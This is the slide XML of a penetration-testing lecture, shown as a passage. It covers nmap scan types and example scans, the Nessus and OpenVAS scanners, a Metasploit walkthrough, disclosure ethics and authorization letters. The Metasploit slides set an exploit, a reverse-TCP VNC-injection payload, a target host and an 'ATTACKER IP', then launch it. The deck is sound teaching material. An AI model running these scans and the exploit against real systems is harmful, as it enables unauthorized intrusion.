            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP SYN scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP connect() scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(UDP scans)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP ACK scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP Window scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP Maimon scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--scanflags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Custom TCP scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;zombie host[:probeport]&gt; (Idlescan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(IP protocol scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sN; -sF; -sX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP Null, FIN, and Xmas scans)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;ftp relay host&gt; (FTP bounce scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto dat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F75EEDC-C555-457F-BD4A-488F3B7C4075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62699-5B86-46F9-AEE7-E793E91835B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Penetration Testing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Penetration Testing?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Testing the security of systems and architectures from the point of view of an attacker (hacker, cracker …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A “simulated attack” with a predetermined goal that has to be obtained within a fixed time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C40089A-E181-4F8A-ACA9-E7A3E2C7A89E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A0253A-833B-48D1-9D3E-C97B088884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Identify active hosts and services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> in the network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24862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800" b="1" smtClean="0"/>
              <a:t>ping sweep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t>useful to identify targets and to verify also rogue hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Ex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t>nmap -v -sP 192.168.100.0/24 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-sP Ping scan. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" smtClean="0"/>
              <a:t>port scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t> useful to identify active ports (services or daemons) that are running on the targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Ex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t>nmap -v -sT 192.168.100.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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-sT normal scan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-sS stealth scan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800" b="1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7258C4A-737F-4E03-9EF0-000ABF84CF1A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F15E1-9799-48DC-B925-F0B277BB03D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Identify target OS version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071563"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>OS Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: there are different values for each OS (Ex. TCP stack, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ex: Nmap –O &lt;target&gt;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2857500"/>
          <a:ext cx="9161463" cy="3429000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1026" name="Worksheet" r:id="rId3" imgW="6553319" imgH="2124015" progId="Excel.Sheet.8">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto dat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FDE4752-4FAD-4CB6-A8D6-1F9FBC0C5CE5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5050E-239C-4EBB-A792-54DA1D81F85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Vulnerability scanning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08962" cy="5256213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is a leader tool in vulnerability scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>There are two components :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>nessusd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> server with plugins’ list of known vulnerabilities (there are different kinds of subscription depending on how old are plugins)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is a front end of the tool there are several version for windows and linux systems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5300" y="260350"/>
            <a:ext cx="1028700" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto dat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AE85F54-95A2-4C8E-A258-F468AC76B73D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8CC97-1C2F-4080-B24A-2AF224B9027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 to Nessus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Created by Renaud Deraison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Currently Maintained by Tenable Network Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Uses the NASL Scripting language for it’s plugins (currently over 13,000 plugins!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Price is still Free! But no more open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Register to obtain many NASL plugins (7 day delay).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Or Purchase a Direct Feed for the Latest!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EA149B4-2A9B-43F6-9B13-493033FAABD5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1EF53-4E17-493B-AD86-782C8E3BD1D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Nessus Features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Client/Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>SSL/PKI supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Smart Service Recognition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(i.e. FTP on 31337)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Non-Destructive or Thorough Tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Vulnerability Mapping to CVE, Bugtraq, and others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Vulnerability Scoring using CVSS from NIST.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E59515D-2E05-4ED9-A54B-1A41325A215A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65CB1C-87EE-48E0-B770-CD5AB7F4245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OpenVAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286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OpenSource Vulnerability Assessment Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Previously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>GNessUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (a GPL fork of the Nessus)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OpenVAS is a security scanner to allow future free development of the now-proprietary NESSUS tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OpenVAS now offers 15’000 Network Vulnerability Tests (NVTs) more all NASL plugins.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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143DC48-C990-4FDF-B2A5-6F83475738BE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093B3-7471-4DB0-94A7-A971E5125E7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Open VAS technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699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20ADC3E-632C-4862-9E5B-A5E32F0258AC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E0BC9-A2C1-4777-BC48-A729865FBAD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297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60488"/>
            <a:ext cx="830580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Exploit vulnerabilities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smtClean="0"/>
              <a:t>metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is a framework that allows to perform real attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>You need to start metasploit from the start menu </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(Penetration Test-&gt;Framework 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US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1823BF-14F0-43EC-8AA8-6F10FBE08598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6716-7380-4184-BABA-F632DE8054F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Select the exploit and the payload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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> exploit: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> windows/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>altn_webadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>altn_webadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select the payload for the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(setting the PAYLOAD global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>datastore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>altn_webadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>PAYLOAD =&gt; windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/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it-IT" dirty="0" smtClean="0"/>
              <a:t>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343FCF1-43C7-4C63-9917-6616D1437B31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C60518-41C4-47E8-8CCB-54716DC4533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Set options for exploit and payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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Show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf exploit(altn_webadmin) &gt;  show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Set the options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set RHOST 192.168.100.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TARGET IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set RPORT 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VULNERABLE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set LHOST 192.168.100.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>Y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACKER IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set TARGET 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TYPE OF EXPLOIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Launch the exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t>msf exploit(altn_webadmin) &gt; exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT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2FF2E93-9CB6-40CA-B624-83F164953F82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58A02-1DD7-4E7A-A7B4-C18D7166F4D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Penetration Testing Is Not…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An alternative to other IT security measures – it complements other tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Expensive game of Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>A guarantee of security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73214E-F06A-4042-952C-622237DA8315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E8954-81F8-40E4-AD0D-F3359EC77A4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Vulnerabilities disclosure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8" y="1285875"/>
            <a:ext cx="8964612" cy="5311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If we find a new vulnerability (Zero Day Vulnerability) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What we have to do?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Do not say anything and maintain the secret perhaps in the future the producer will fix it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Spread the information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to all or just to the producer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Which level of detail reveal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Full disclosure with possibility of helping cracker?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Partial disclosure that could be unuseful?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Sell it …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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996DF26-3776-4FE9-9C48-9683C67C9A70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1D242-44BC-4C91-80BB-94B472EEE7E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Authorization Letter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mtClean="0"/>
              <a:t>Detailed agreements/scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Anything off limits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hours of testing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social Engineering allowed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>War Dialing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>War Driving?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Denials of Service?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Define the end point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Consult a lawyer before starting the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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4818972-638C-48F9-92CC-877B5E7728A6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02A705-3BFB-4D68-979D-81DCC34AAB9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 Tell or Not to Tell?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Telling too many people may invalidate the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>However, you don’t want valuable resources chasing a non-existent “intruder” very long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
